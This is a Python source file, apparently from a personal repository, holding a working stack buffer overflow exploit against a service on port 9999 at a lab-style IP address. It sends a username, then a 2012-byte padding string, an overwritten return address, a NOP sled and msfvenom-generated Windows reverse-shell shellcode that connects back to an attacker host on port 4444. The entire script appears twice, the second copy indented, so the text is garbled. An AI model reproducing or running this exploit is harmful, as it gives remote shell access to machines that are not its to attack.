jayateertha043/exploit.py

## exploit.py
import sys, socket, time

#Remote Victim IP
ip = '10.10.111.31'
port = 9999


#Generated using msfvenom
"""msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\\x00' -f py"""

#Replace Payload Here from metasploit output
buf =  b""
buf += b"\xd9\xce\xbf\x0d\xba\x7a\xc5\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x52\x83\xc0\x04\x31\x78\x13\x03\x75\xa9\x98"
buf += b"\x30\x79\x25\xde\xbb\x81\xb6\xbf\x32\x64\x87\xff\x21"
buf += b"\xed\xb8\xcf\x22\xa3\x34\xbb\x67\x57\xce\xc9\xaf\x58"
buf += b"\x67\x67\x96\x57\x78\xd4\xea\xf6\xfa\x27\x3f\xd8\xc3"
buf += b"\xe7\x32\x19\x03\x15\xbe\x4b\xdc\x51\x6d\x7b\x69\x2f"
buf += b"\xae\xf0\x21\xa1\xb6\xe5\xf2\xc0\x97\xb8\x89\x9a\x37"
buf += b"\x3b\x5d\x97\x71\x23\x82\x92\xc8\xd8\x70\x68\xcb\x08"
buf += b"\x49\x91\x60\x75\x65\x60\x78\xb2\x42\x9b\x0f\xca\xb0"
buf += b"\x26\x08\x09\xca\xfc\x9d\x89\x6c\x76\x05\x75\x8c\x5b"
buf += b"\xd0\xfe\x82\x10\x96\x58\x87\xa7\x7b\xd3\xb3\x2c\x7a"
buf += b"\x33\x32\x76\x59\x97\x1e\x2c\xc0\x8e\xfa\x83\xfd\xd0"
buf += b"\xa4\x7c\x58\x9b\x49\x68\xd1\xc6\x05\x5d\xd8\xf8\xd5"
buf += b"\xc9\x6b\x8b\xe7\x56\xc0\x03\x44\x1e\xce\xd4\xab\x35"
buf += b"\xb6\x4a\x52\xb6\xc7\x43\x91\xe2\x97\xfb\x30\x8b\x73"
buf += b"\xfb\xbd\x5e\xd3\xab\x11\x31\x94\x1b\xd2\xe1\x7c\x71"
buf += b"\xdd\xde\x9d\x7a\x37\x77\x37\x81\xd0\x72\xc2\x5e\x67"
buf += b"\xeb\xd0\x60\x79\xb7\x5d\x86\x13\x57\x08\x11\x8c\xce"
buf += b"\x11\xe9\x2d\x0e\x8c\x94\x6e\x84\x23\x69\x20\x6d\x49"
buf += b"\x79\xd5\x9d\x04\x23\x70\xa1\xb2\x4b\x1e\x30\x59\x8b"
buf += b"\x69\x29\xf6\xdc\x3e\x9f\x0f\x88\xd2\x86\xb9\xae\x2e"
buf += b"\x5e\x81\x6a\xf5\xa3\x0c\x73\x78\x9f\x2a\x63\x44\x20"
buf += b"\x77\xd7\x18\x77\x21\x81\xde\x21\x83\x7b\x89\x9e\x4d"
buf += b"\xeb\x4c\xed\x4d\x6d\x51\x38\x38\x91\xe0\x95\x7d\xae"
buf += b"\xcd\x71\x8a\xd7\x33\xe2\x75\x02\xf0\x12\x3c\x0e\x51"
buf += b"\xbb\x99\xdb\xe3\xa6\x19\x36\x27\xdf\x99\xb2\xd8\x24"
buf += b"\x81\xb7\xdd\x61\x05\x24\xac\xfa\xe0\x4a\x03\xfa\x20"


payload = buf

offset = ("A"*2012).encode()
eip = b"\xdf\x14\x50\x62"
#does nothing ensures, our payload doesn't get cut
nops = b'\x90'* 40
#this is where our exploit code will be
esp = nops + payload

buffer = offset + eip + esp

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((ip, port))

#initial welcome message
tmp = s.recv(1024)

#send username
user = "Jayateertha\r\n"
s.send(user.encode())

#Receive reply
tmp = s.recv(1024)

print("sending "+str(len(buffer)) + " bytes")
#send message
buffer = buffer + b"\r\n"
s.send(buffer)
	import sys, socket, time

	#Remote Victim IP
	ip = '10.10.111.31'
	port = 9999



	#Generated using msfvenom
	"""msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\\x00' -f py"""

	#Replace Payload Here from metasploit output
	buf = b""
	buf += b"\xd9\xce\xbf\x0d\xba\x7a\xc5\xd9\x74\x24\xf4\x58\x31"
	buf += b"\xc9\xb1\x52\x83\xc0\x04\x31\x78\x13\x03\x75\xa9\x98"
	buf += b"\x30\x79\x25\xde\xbb\x81\xb6\xbf\x32\x64\x87\xff\x21"
	buf += b"\xed\xb8\xcf\x22\xa3\x34\xbb\x67\x57\xce\xc9\xaf\x58"
	buf += b"\x67\x67\x96\x57\x78\xd4\xea\xf6\xfa\x27\x3f\xd8\xc3"
	buf += b"\xe7\x32\x19\x03\x15\xbe\x4b\xdc\x51\x6d\x7b\x69\x2f"
	buf += b"\xae\xf0\x21\xa1\xb6\xe5\xf2\xc0\x97\xb8\x89\x9a\x37"
	buf += b"\x3b\x5d\x97\x71\x23\x82\x92\xc8\xd8\x70\x68\xcb\x08"
	buf += b"\x49\x91\x60\x75\x65\x60\x78\xb2\x42\x9b\x0f\xca\xb0"
	buf += b"\x26\x08\x09\xca\xfc\x9d\x89\x6c\x76\x05\x75\x8c\x5b"
	buf += b"\xd0\xfe\x82\x10\x96\x58\x87\xa7\x7b\xd3\xb3\x2c\x7a"
	buf += b"\x33\x32\x76\x59\x97\x1e\x2c\xc0\x8e\xfa\x83\xfd\xd0"
	buf += b"\xa4\x7c\x58\x9b\x49\x68\xd1\xc6\x05\x5d\xd8\xf8\xd5"
	buf += b"\xc9\x6b\x8b\xe7\x56\xc0\x03\x44\x1e\xce\xd4\xab\x35"
	buf += b"\xb6\x4a\x52\xb6\xc7\x43\x91\xe2\x97\xfb\x30\x8b\x73"
	buf += b"\xfb\xbd\x5e\xd3\xab\x11\x31\x94\x1b\xd2\xe1\x7c\x71"
	buf += b"\xdd\xde\x9d\x7a\x37\x77\x37\x81\xd0\x72\xc2\x5e\x67"
	buf += b"\xeb\xd0\x60\x79\xb7\x5d\x86\x13\x57\x08\x11\x8c\xce"
	buf += b"\x11\xe9\x2d\x0e\x8c\x94\x6e\x84\x23\x69\x20\x6d\x49"
	buf += b"\x79\xd5\x9d\x04\x23\x70\xa1\xb2\x4b\x1e\x30\x59\x8b"
	buf += b"\x69\x29\xf6\xdc\x3e\x9f\x0f\x88\xd2\x86\xb9\xae\x2e"
	buf += b"\x5e\x81\x6a\xf5\xa3\x0c\x73\x78\x9f\x2a\x63\x44\x20"
	buf += b"\x77\xd7\x18\x77\x21\x81\xde\x21\x83\x7b\x89\x9e\x4d"
	buf += b"\xeb\x4c\xed\x4d\x6d\x51\x38\x38\x91\xe0\x95\x7d\xae"
	buf += b"\xcd\x71\x8a\xd7\x33\xe2\x75\x02\xf0\x12\x3c\x0e\x51"
	buf += b"\xbb\x99\xdb\xe3\xa6\x19\x36\x27\xdf\x99\xb2\xd8\x24"
	buf += b"\x81\xb7\xdd\x61\x05\x24\xac\xfa\xe0\x4a\x03\xfa\x20"


	payload = buf

	offset = ("A"*2012).encode()
	eip = b"\xdf\x14\x50\x62"
	#does nothing ensures, our payload doesn't get cut
	nops = b'\x90'* 40
	#this is where our exploit code will be
	esp = nops + payload

	buffer = offset + eip + esp

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(5)
	s.connect((ip, port))

	#initial welcome message
	tmp = s.recv(1024)

	#send username
	user = "Jayateertha\r\n"
	s.send(user.encode())

	#Receive reply
	tmp = s.recv(1024)

	print("sending "+str(len(buffer)) + " bytes")
	#send message
	buffer = buffer + b"\r\n"
	s.send(buffer)